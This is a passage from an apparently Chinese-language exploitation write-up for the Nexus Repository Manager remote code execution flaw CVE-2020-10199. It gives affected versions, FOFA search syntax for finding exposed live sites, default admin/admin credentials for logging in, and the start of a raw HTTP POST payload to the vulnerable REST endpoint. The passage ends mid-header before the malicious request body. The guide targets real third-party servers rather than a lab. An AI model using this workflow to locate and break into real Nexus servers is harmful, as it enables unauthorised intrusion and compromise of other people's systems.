@MoCo菜弟弟 Nexus远程命令执行CVE-2020-10199
0x01漏洞描述
2020年03月31 日,Sonatype 官方发布安全公告,声明修复了存在于 Nexus Repository Manager 3 中的远程代码执行漏洞 CVE-2020-10199。
Sonatype Nexus 是一个 Maven 的仓库管理系统,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建 Maven 仓库私服,在代理远程仓库的同时维护本地仓库,以节省带宽和时间。
在 Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中,由于某处功能安全处理不当,导致经过授权认证的攻击者,可以在远程通过构造恶意的 HTTP 请求,在服务端执行任意恶意代码,获取系统权限。
0x02漏洞影响
危险等级
高危
影响版本
Nexus Repository Manager OSS/Pro 3.x <= 3.21.1
0x03资产收集
首先开启万能的FOFA,让我们搜一波Nexus Repository Manager OSS/Pro的站
FOFA语法
app="Nexus"
寻找一个版本<= 3.21.1站点进去
默认账号admin
默认密码admin
0x04漏洞验证
Payload:
POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: XXX.XXX.XXx.XXX:XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Nexus-UI: true
NX-ANTI-CSRF-TOKEN: 0.XXXXXXXXXXXXXXXX
Content-T